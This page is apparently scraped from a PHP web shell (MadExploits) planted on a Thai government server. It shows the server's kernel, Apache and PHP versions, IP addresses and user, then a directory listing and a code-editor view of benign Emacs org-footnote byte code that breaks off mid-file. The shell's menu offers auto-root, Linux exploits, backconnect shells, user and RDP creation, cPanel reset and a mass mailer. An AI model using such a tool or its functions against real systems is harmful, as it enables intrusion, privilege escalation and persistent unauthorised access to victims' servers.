Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
emacs /
23.1 /
lisp /
org /
[ HOME SHELL ]
Name
Size
Permission
Action
org-agenda.elc
214.7
KB
-rw-r--r--
org-archive.elc
11.75
KB
-rw-r--r--
org-attach.elc
14.21
KB
-rw-r--r--
org-bbdb.elc
7.37
KB
-rw-r--r--
org-bibtex.elc
4.13
KB
-rw-r--r--
org-clock.elc
35.05
KB
-rw-r--r--
org-colview.elc
41.45
KB
-rw-r--r--
org-compat.elc
7.48
KB
-rw-r--r--
org-exp.elc
149.66
KB
-rw-r--r--
org-export-latex.elc
44.23
KB
-rw-r--r--
org-faces.elc
20.18
KB
-rw-r--r--
org-footnote.elc
13.77
KB
-rw-r--r--
org-gnus.elc
5.74
KB
-rw-r--r--
org-id.elc
16.92
KB
-rw-r--r--
org-info.elc
1.68
KB
-rw-r--r--
org-install.elc
635
B
-rw-r--r--
org-irc.elc
5.89
KB
-rw-r--r--
org-jsinfo.elc
5.39
KB
-rw-r--r--
org-list.elc
32.5
KB
-rw-r--r--
org-mac-message.elc
2.27
KB
-rw-r--r--
org-macs.elc
7.83
KB
-rw-r--r--
org-mew.elc
2.92
KB
-rw-r--r--
org-mhe.elc
5.16
KB
-rw-r--r--
org-mouse.elc
32.83
KB
-rw-r--r--
org-plot.elc
10.28
KB
-rw-r--r--
org-publish.elc
20.43
KB
-rw-r--r--
org-remember.elc
31.7
KB
-rw-r--r--
org-rmail.elc
2.82
KB
-rw-r--r--
org-table.elc
136.62
KB
-rw-r--r--
org-timer.elc
7.61
KB
-rw-r--r--
org-vm.elc
2.91
KB
-rw-r--r--
org-w3m.elc
3.88
KB
-rw-r--r--
org-wl.elc
2.82
KB
-rw-r--r--
org.elc
505.8
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : org-footnote.elc
;ELC ;;; Compiled by mockbuild@c6b8.bsys.dev.centos.org on Thu Feb 19 13:04:45 2015 ;;; from file /builddir/build/BUILD/emacs-23.1/lisp/org/org-footnote.el ;;; in Emacs version 23.1.1 ;;; with all optimizations. ;;; This file uses dynamic docstrings, first added in Emacs 19.29. (if (and (boundp 'emacs-version) (< (aref emacs-version (1- (length emacs-version))) ?A) (or (and (boundp 'epoch::version) epoch::version) (string-lessp emacs-version "19.29"))) (error "`org-footnote.el' was compiled for Emacs 19.29 or later")) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; (byte-code "\300\301!\210\300\302!\207" [require org-macs org-compat] 2) #@44 Regular expression for matching footnotes. (defconst org-footnote-re "[^][\n]\\[\\(?:\\([0-9]+\\)\\|\\(fn:\\([-_[:word:]]+?\\)?\\)\\(?::\\([^]]*?\\)\\)?\\)\\]" (#$ . 692)) #@59 Regular expression matching the definition of a footnote. (defconst org-footnote-definition-re "^\\(\\[\\([0-9]+\\|fn:[-_[:word:]]+\\)\\]\\)" (#$ . 870)) #@563 Outline heading containing footnote definitions before export. This can be nil, to place footnotes locally at the end of the current outline node. If can also be the name of a special outline heading under which footnotes should be put. This variable defines the place where Org puts the definition automatically, i.e. when creating the footnote, and when sorting the notes. However, by hand you may place definitions *anywhere*. If this is a string, during export, all subtrees starting with this heading will be removed after extracting footnote definitions. (custom-declare-variable 'org-footnote-section '"Footnotes" '(#$ . 1031) :group 'org-footnotes :type '(choice (string :tag "Collect fotnotes under heading") (const :tag "Define footnotes locally" nil))) #@397 Tag marking the beginning of footnote section. The Org-mode footnote engine can be used in arbitrary text files as well as in Org-mode. Outside Org-mode, new footnotes are always placed at the end of the file. When you normalize the notes, any line containing only this tag will be removed, a new one will be inserted at the end of the file, followed by the collected and normalized footnotes. (custom-declare-variable 'org-footnote-tag-for-non-org-mode-files '"Footnotes:" '(#$ . 1803) :group 'org-footnotes :type 'string) #@258 Non-nil means, define footnotes inline, at reference location. When nil, footnotes will be defined in a special section near the end of the document. When t, the [fn:label:definition] notation will be used to define the footnote at the reference position. (custom-declare-variable 'org-footnote-define-inline 'nil '(#$ . 2336) :group 'org-footnote :type 'boolean) #@429 Non-nil means, define automatically new labels for footnotes. Possible values are: nil prompt the user for each label t create unique labels of the form [fn:1], [fn:2], ... confirm like t, but let the user edit the created value. In particular, the label can be removed from the minibuffer, to create an anonymous footnote. plain Automatically create plain number labels like [1] (custom-declare-variable 'org-footnote-auto-label 't '(#$ . 2708) :group 'org-footnote :type '(choice (const :tag "Frompt for label" nil) (const :tag "Create automatic [fn:N]" t) (const :tag "Offer automatic [fn:N] for editing" confirm) (const :tag "Create automatic [N]" plain))) #@240 Non-nil means, fill paragraphs after extracting footnotes. When extracting inline footnotes, the lengths of lines can change a lot. When this option is set, paragraphs from which an inline footnote has been extracted will be filled again. (custom-declare-variable 'org-footnote-fill-after-inline-note-extraction 'nil '(#$ . 3424) :group 'org-footnote :type 'boolean) #@120 Is the cursor at a footnote reference? If yes, return the beginning position, the label, and the definition, if local. (defalias 'org-footnote-at-reference-p #[nil "\301\302\"\205 \303\224\304\305!\206 \304\306!\307\232?\205 \304\306!\304\310!E\207" [org-footnote-re org-in-regexp 15 0 match-string 1 2 "fn:" 4] 4 (#$ . 3798)]) #@381 Is the cursor at a footnote definition. This matches only pure definitions like [1] or [fn:name] at the beginning of a line. It does not a references like [fn:name:definition], where the footnote text is included and defined locally. The return value will be nil if not at a footnote definition, and a list with start and label of the footnote if there is a definition at point. (defalias 'org-footnote-at-definition-p #[nil "\212\302\210\212\303\304\305\306#)\303 \306#\205 \307\224\310\311!D*\207" [lim org-footnote-definition-re 1 re-search-backward "^\\*+ \\|^[ ]*$" nil t 0 match-string 2] 4 (#$ . 4137)]) #@55 Find the definition of the footnote with label LABEL. (defalias 'org-footnote-goto-definition #[(label) "\303 \210\304!\305\306\211#\307\212\310\n\307\311#\2061 eb\203% \310\n\307\311#\2061 ~\210eb\2051 \310\n\307\311#) \204>